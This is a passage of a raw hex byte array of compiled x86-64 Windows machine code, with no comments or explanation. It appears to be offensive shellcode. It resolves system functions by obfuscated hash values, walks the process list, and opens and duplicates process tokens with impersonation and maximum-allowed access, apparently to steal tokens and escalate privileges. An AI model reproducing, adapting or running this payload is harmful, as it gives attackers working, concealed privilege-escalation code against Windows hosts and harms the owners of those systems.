B,0x4D,0xF8,0x48,0x8B,0x55,0x10,0x48,0x8B,0x45,0x18,0x4C,0x8B,0x55,0xE8,0x45,0x89,0xC1,0x41,0x89,0xC8,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xF0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x29,0x22,0x00,0x00,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x83,0x7D,0xF0,0x00,0x75,0x6D,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x0B,0x92,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC6,0xE4,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xDE,0x92,0x8E,0x56,0x48,0x89,0xC1,0xE8,0xD4,0xE2,0xFF,0xFF,0x48,0x89,0x45,0xE0,0x48,0x83,0x7D,0xE0,0x00,0x74,0x3E,0x48,0x8B,0x45,0x18,0x48,0x8B,0x00,0x48,0x8D,0x55,0xD8,0x4C,0x8B,0x55,0xE0,0x41,0xB9,0x08,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x15,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0x10,0x00,0x74,0x0C,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x94,0x21,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x1B,0x48,0x8B,0x45,0x18,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x45,0x18,0x48,0x8B,0x00,0x48,0x89,0xC1,0xE8,0x73,0x21,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x15,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xD8,0x48,0x89,0xC1,0xE8,0x58,0x21,0x00,0x00,0x83,0x7D,0xFC,0x00,0x74,0x06,0x48,0x8B,0x45,0xD8,0xEB,0x05,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x10,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x6F,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x08,0x91,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC3,0xE3,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xD4,0x0B,0x8F,0x24,0x48,0x89,0xC1,0xE8,0xD1,0xE1,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x36,0x48,0x8B,0x45,0x10,0x48,0x8B,0x55,0xF8,0x48,0x89,0xC1,0xFF,0xD2,0x89,0x45,0xF4,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xC3,0x20,0x00,0x00,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0x70,0x90,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x8D,0x05,0x8D,0x90,0x00,0x00,0x48,0x89,0x45,0xE8,0x48,0x8D,0x45,0xE0,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0xB8,0x02,0x00,0x00,0x00,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0xE8,0xB8,0x32,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x4F,0x4C,0x8D,0x45,0xF0,0x8B,0x4D,0x28,0x48,0x8B,0x55,0x20,0x48,0x8B,0x45,0x10,0x4D,0x89,0xC1,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x9F,0x00,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x2C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x48,0x00,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x1A,0x48,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x18,0x48,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x15,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xB0,0x1F,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x41,0xB9,0x08,0x00,0x00,0x00,0x4C,0x8D,0x45,0x10,0xBA,0x05,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFE,0xFF,0xFF,0xFF,0xE8,0x01,0x26,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x81,0xEC,0x28,0x01,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xC0,0x00,0x00,0x00,0x48,0x89,0x95,0xC8,0x00,0x00,0x00,0x44,0x89,0x85,0xD0,0x00,0x00,0x00,0x4C,0x89,0x8D,0xD8,0x00,0x00,0x00,0xC7,0x85,0x9C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x68,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x90,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x60,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x58,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x50,0x00,0x00,0x00,0x00,0xC7,0x45,0x4C,0x00,0x10,0x00,0x00,0x8B,0x45,0x4C,0x89,0x85,0x84,0x00,0x00,0x00,0x48,0xC7,0x45,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x38,0x00,0x00,0x00,0x00,0xC7,0x85,0x80,0x00,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0x20,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x28,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xF0,0x0F,0x11,0x45,0x00,0x0F,0x11,0x45,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xF3,0x8E,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3A,0xE1,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xA4,0x97,0x06,0x9A,0x48,0x89,0xC1,0xE8,0x48,0xDF,0xFF,0xFF,0x48,0x89,0x45,0x78,0x48,0x83,0x7D,0x78,0x00,0x0F,0x84,0x19,0x04,0x00,0x00,0x48,0x8D,0x55,0x68,0x48,0x8B,0x85,0xC0,0x00,0x00,0x00,0x4C,0x8B,0x45,0x78,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x75,0x05,0xE9,0x00,0x04,0x00,0x00,0x8B,0x45,0x4C,0x89,0x85,0x84,0x00,0x00,0x00,0x8B,0x45,0x4C,0x89,0xC3,0x48,0x8B,0x05,0x6B,0x09,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x67,0x09,0x01,0x00,0xFF,0xD0,0x48,0x89,0x85,0x90,0x00,0x00,0x00,0x48,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x0F,0x84,0xB9,0x03,0x00,0x00,0x8B,0x55,0x4C,0x48,0x8D,0x4D,0x4C,0x48,0x8B,0x85,0x90,0x00,0x00,0x00,0x49,0x89,0xC9,0x41,0x89,0xD0,0x48,0x89,0xC2,0xB9,0x05,0x00,0x00,0x00,0xE8,0x44,0x21,0x00,0x00,0x89,0x85,0x80,0x00,0x00,0x00,0x83,0xBD,0x80,0x00,0x00,0x00,0x00,0x79,0x78,0x48,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x74,0x4C,0x8B,0x95,0x84,0x00,0x00,0x00,0x48,0x8B,0x85,0x90,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF1,0x66,0x00,0x00,0x48,0x8B,0x05,0xE2,0x08,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x95,0x90,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xDF,0x08,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0x90,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x81,0xBD,0x80,0x00,0x00,0x00,0x23,0x00,0x00,0xC0,0x0F,0x84,0x2A,0xFF,0xFF,0xFF,0x81,0xBD,0x80,0x00,0x00,0x00,0x04,0x00,0x00,0xC0,0x0F,0x84,0x1A,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0xBD,0x80,0x00,0x00,0x00,0x00,0x0F,0x88,0x06,0x03,0x00,0x00,0x48,0x8B,0x85,0x90,0x00,0x00,0x00,0x48,0x89,0x85,0x88,0x00,0x00,0x00,0xC7,0x45,0xF0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0x08,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x18,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x0C,0x00,0x00,0x00,0xC7,0x45,0xB8,0x02,0x00,0x00,0x00,0xC6,0x45,0xBC,0x00,0xC6,0x45,0xBD,0x00,0x48,0x8D,0x45,0xB4,0x48,0x89,0x45,0xE8,0x48,0x8B,0x85,0x88,0x00,0x00,0x00,0x48,0x8B,0x40,0x50,0x48,0x89,0x45,0x20,0x48,0x8D,0x4D,0x20,0x48,0x8D,0x55,0xF0,0x48,0x8D,0x45,0x60,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7F,0x1B,0x00,0x00,0x89,0x85,0x80,0x00,0x00,0x00,0x83,0xBD,0x80,0x00,0x00,0x00,0x00,0x0F,0x88,0xDD,0x01,0x00,0x00,0x48,0x8B,0x45,0x60,0x48,0x8D,0x55,0x58,0x49,0x89,0xD0,0xBA,0x0A,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB6,0x1C,0x00,0x00,0x89,0x85,0x80,0x00,0x00,0x00,0x83,0xBD,0x80,0x00,0x00,0x00,0x00,0x0F,0x88,0x9E,0x01,0x00,0x00,0x48,0x8B,0x45,0x58,0x48,0x8D,0x4D,0xC0,0x48,0x8D,0x55,0x50,0x48,0x89,0x54,0x24,0x28,0xC7,0x44,0x24,0x20,0x02,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xC8,0xBA,0x00,0x00,0x00,0x02,0x48,0x89,0xC1,0xE8,0x47,0x22,0x00,0x00,0x89,0x85,0x80,0x00,0x00,0x00,0x83,0xBD,0x80,0x00,0x00,0x00,0x00,0x0F,0x88,0x48,0x01,0x00,0x00,0x48,0x8B,0x45,0x50,0x48,0x8D,0x55,0x40,0x48,0x89,0xC1,0xE8,0xE7,0x05,0x00,0x00,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x0F,0x84,0x0E,0x01,0x00,0x00,0x48,0x8B,0x45,0x50,0x48,0x8D,0x55,0x38,0x48,0x89,0xC1,0xE8,0xBC,0x0B,0x00,0x00,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x0F,0x84,0xD9,0x00,0x00,0x00,0x48,0x8B,0x55,0x68,0x48,0x8B,0x45,0x40,0x48,0x89,0xC1,0xE8,0x4A,0x09,0x00,0x00,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x74,0x6A,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x50,0x48,0x8D,0x55,0xB0,0x48,0x89,0xC1,0xE8,0x1C,0x0A,0x00,0x00,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x74,0x4A,0x8B,0x45,0xB0,0x85,0xC0,0x74,0x43,0x48,0x8B,0x45,0x50,0x8B,0x8D,0xD0,0x00,0x00,0x00,0x48,0x8B,0x95,0xC8,0x00,0x00,0x00,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xFC,0x2D,0x00,0x00,0x89,0x45,0x74,0x83,0x7D,0x74,0x00,0x74,0x18,0x48,0x8B,0x55,0x50,0x48,0x8B,0x85,0xD8,0x00,0x00,0x00,0x48,0x89,0x10,0xC7,0x85,0x9C,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0x38,0x48,0x85,0xC0,0x74,0x4D,0x48,0x8B,0x45,0x38,0x48,0x89,0xC1,0xE8,0xDA,0x64,0x00,0x00,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0x38,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x72,0x64,0x00,0x00,0x48,0x8B,0x5D,0x38,0x48,0x8B,0x05,0x5F,0x06,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x63,0x06,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0x38,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x40,0x48,0x89,0xC1,0x48,0x8B,0x05,0x6B,0x06,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0x40,0x00,0x00,0x00,0x00,0x83,0xBD,0x9C,0x00,0x00,0x00,0x00,0x75,0x14,0x48,0x8B,0x45,0x50,0x48,0x89,0xC1,0xE8,0xCA,0x1A,0x00,0x00,0x48,0xC7,0x45,0x50,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x58,0x48,0x89,0xC1,0xE8,0xB6,0x1A,0x00,0x00,0x48,0xC7,0x45,0x58,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x60,0x48,0x89,0xC1,0xE8,0xA2,0x1A,0x00,0x00,0x48,0xC7,0x45,0x60,0x00,0x00,0x00,0x00,0x83,0xBD,0x9C,0x00,0x00,0x00,0x00,0x75,0x24,0x48,0x8B,0x85,0x88,0x00,0x00,0x00,0x8B,0x00,0x85,0xC0,0x74,0x1A,0x48,0x8B,0x85,0x88,0x00,0x00,0x00,0x8B,0x00,0x89,0xC0,0x48,0x01,0x85,0x88,0x00,0x00,0x00,0xE9,0xB5,0xFD,0xFF,0xFF,0x90,0xEB,0x01,0x90,0x83,0xBD,0x9C,0x00,0x00,0x00,0x00,0x75,0x29,0x48,0x8D,0x05,0xE3,0x8A,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3B,0xBA,0xFF,0xFF,0x48,0x8D,0x05,0x05,0x8B,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2C,0xBA,0xFF,0xFF,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0x68,0x48,0x85,0xC0,0x74,0x10,0x48,0x8B,0x45,0x68,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA1,0x05,0x01,0x00,0xFF,0xD0,0x48,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x74,0x55,0x48,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x74,0x4B,0x8B,0x45,0x4C,0x89,0xC2,0x48,0x8B,0x85,0x90,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3F,0x63,0x00,0x00,0x48,0x8B,0x05,0x30,0x05,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x95,0x90,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x2D,0x05,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0x90,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x85,0x9C,0x00,0x00,0x00,0x48,0x81,0xC4,0x28,0x01,0x00,0x00,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xFB,0x89,0x00,0x00,0x48,0x89,0xC1,0xE8,0x42,0xDC,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x22,0x96,0xBC,0x93,0x48,0x89,0xC1,0xE8,0x50,0xDA,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x0C,0x48,0x8B,0x45,0xF0,0xFF,0xD0,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xE0,0x00,0x00,0x00,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0x0F,0x11,0x45,0xC0,0x48,0xC7,0x45,0x94,0x00,0x00,0x00,0x00,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x60,0xFF,0xFF,0xFF,0x0F,0x11,0x85,0x70,0xFF,0xFF,0xFF,0x0F,0x11,0x45,0x80,0x48,0x8B,0x45,0x18,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0xC7,0x45,0xA0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x85,0x60,0xFF,0xFF,0xFF,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x68,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x78,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x70,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x80,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x88,0x00,0x00,0x00,0x00,0xC7,0x45,0x94,0x0C,0x00,0x00,0x00,0xC7,0x45,0x98,0x02,0x00,0x00,0x00,0xC6,0x45,0x9C,0x00,0xC6,0x45,0x9D,0x00,0x48,0x8D,0x45,0x94,0x48,0x89,0x45,0x88,0x8B,0x45,0x10,0x48,0x89,0x45,0xD0,0x48,0x8D,0x05,0x4A,0x88,0x00,0x00,0x48,0x89,0x85,0x50,0xFF,0xFF,0xFF,0x48,0x8D,0x05,0x64,0x88,0x00,0x00,0x48,0x89,0x85,0x58,0xFF,0xFF,0xFF,0x48,0x8D,0x85,0x50,0xFF,0xFF,0xFF,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0xB8,0x02,0x00,0x00,0x00,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0xE8,0x89,0x2A,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x0F,0x84,0xAA,0x00,0x00,0x00,0x48,0x8D,0x4D,0xD0,0x48,0x8D,0x55,0xA0,0x48,0x8D,0x45,0xF0,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC4,0x16,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x88,0x81,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x0A,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x01,0x18,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x63,0x48,0x8B,0x45,0xE8,0x48,0x8D,0x8D,0x60,0xFF,0xFF,0xFF,0x48,0x8D,0x55,0xE0,0x48,0x89,0x54,0x24,0x28,0xC7,0x44,0x24,0x20,0x02,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xC8,0xBA,0x00,0x00,0x00,0x02,0x48,0x89,0xC1,0xE8,0x99,0x1D,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x2B,0x48,0x8B,0x45,0xE0,0x48,0x89,0xC1,0xE8,0xB3,0xF7,0xFF,0xFF,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x74,0x19,0x48,0x8B,0x55,0xE0,0x48,0x8B,0x45,0x18,0x48,0x89,0x10,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x22,0x17,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x0D,0x17,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x15,0x48,0x8B,0x45,0xE0,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xE0,0x48,0x89,0xC1,0xE8,0xF2,0x16,0x00,0x00,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xE0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x8D,0x05,0xED,0x86,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x8D,0x05,0x8A,0x87,0x00,0x00,0x48,0x89,0x45,0xE8,0x48,0x8D,0x55,0xE0,0x48,0x8B,0x45,0x10,0x41,0xB9,0x02,0x00,0x00,0x00,0x49,0x89,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0xA7,0x87,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0B,0xF6,0xFF,0xFF,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x75,0x1E,0x48,0x8D,0x05,0xA1,0x87,0x00,0x00,0x48,0x89,0xC1,0xE8,0x73,0xB6,0xFF,0xFF,0x48,0x8D,0x05,0x3D,0x87,0x00,0x00,0x48,0x89,0xC1,0xE8,0x64,0xB6,0xFF,0xFF,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC2,0x48,0x8D,0x05,0x79,0x87,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAD,0xF5,0xFF,0xFF,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x75,0x1E,0x48,0x8D,0x05,0x75,0x87,0x00,0x00,0x48,0x89,0xC1,0xE8,0x15,0xB6,0xFF,0xFF,0x48,0x8D,0x05,0xDF,0x86,0x00,0x00,0x48,0x89,0xC1,0xE8,0x06,0xB6,0xFF,0xFF,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x68,0x48,0x8D,0x6C,0x24,0x60,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x08,0x00,0x00,0x00,0x8B,0x45,0xD8,0x89,0x45,0xEC,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x01,0x00,0x00,0xC0,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x41,0x86,0x00,0x00,0x48,0x89,0xC1,0xE8,0x88,0xD8,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x7F,0xE4,0xDE,0xE9,0x48,0x89,0xC1,0xE8,0x96,0xD6,0xFF,0xFF,0x48,0x89,0x45,0xE0,0x48,0x83,0x7D,0xE0,0x00,0x0F,0x84,0x1D,0x01,0x00,0x00,0x8B,0x45,0xD8,0x89,0x45,0xEC,0x8B,0x45,0xD8,0x89,0xC3,0x48,0x8B,0x05,0xDF,0x00,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xDB,0x00,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xE9,0x00,0x00,0x00,0x44,0x8B,0x45,0xD8,0x48,0x8B,0x4D,0xF0,0x48,0x8B,0x45,0x20,0x48,0x8D,0x55,0xD8,0x48,0x89,0x54,0x24,0x20,0x45,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1B,0x1B,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x79,0x56,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xEC,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x73,0x5E,0x00,0x00,0x48,0x8B,0x05,0x64,0x00,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x64,0x00,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xE8,0x23,0x00,0x00,0xC0,0x0F,0x84,0x44,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xE8,0x00,0x78,0x5E,0xBA,0x44,0x00,0x00,0x00,0xB9,0x40,0x00,0x00,0x00,0x48,0x8B,0x05,0x4B,0x00,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0x28,0x48,0x89,0x02,0x48,0x8B,0x